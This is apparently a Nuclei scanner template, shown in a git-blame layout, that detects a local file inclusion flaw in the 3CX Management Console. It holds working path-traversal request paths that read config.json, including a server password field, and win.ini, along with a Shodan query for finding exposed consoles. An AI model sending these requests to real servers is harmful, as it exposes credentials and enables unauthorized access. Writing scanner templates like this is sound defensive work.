2022-04-02 10:54:05 +00:00
|
|
|
id: 3cx-management-console
|
|
|
|
|
|
|
|
info:
|
2022-07-26 13:45:11 +00:00
|
|
|
name: 3CX Management Console - Local File Inclusion
|
2022-04-02 10:54:05 +00:00
|
|
|
author: random-robbie
|
|
|
|
severity: high
|
2022-07-26 13:45:11 +00:00
|
|
|
description: 3CX Management Console is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
|
2022-07-26 13:45:11 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2022-04-02 10:54:05 +00:00
|
|
|
metadata:
|
2023-04-28 08:11:21 +00:00
|
|
|
max-request: 2
|
2023-07-22 07:58:18 +00:00
|
|
|
shodan-query: http.title:"3CX Phone System Management Console"
|
2022-04-02 10:54:05 +00:00
|
|
|
tags: 3cx,lfi,voip
|
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-04-02 10:54:05 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
|
2022-04-06 04:00:14 +00:00
|
|
|
- '{{BaseURL}}/Electron/download/windows/\windows\win.ini'
|
|
|
|
|
|
|
|
stop-at-first-match: true
|
2023-10-14 11:27:55 +00:00
|
|
|
|
2022-04-06 04:00:14 +00:00
|
|
|
matchers-condition: or
|
2022-04-02 10:54:05 +00:00
|
|
|
matchers:
|
2022-04-06 04:00:14 +00:00
|
|
|
- type: word
|
2022-04-02 10:54:05 +00:00
|
|
|
part: body
|
2022-04-06 04:00:14 +00:00
|
|
|
words:
|
|
|
|
- "CfgServerPassword"
|
|
|
|
- "CfgServerAppName"
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "bit app support"
|
|
|
|
- "fonts"
|
|
|
|
- "extensions"
|
|
|
|
condition: and
|
2023-10-20 11:41:13 +00:00
|
|
|
|
|
|
|
# digest: 490a00463044022024041946d635a84a40ec7d965323005359f645b2ef2e8a63879f2d67a720f42802207afecf87f277632605890f2e2c0ed3cf69b8c01e3368d1b01d9bc6df00126052:922c64590222798bb761d5b6d8e72950
|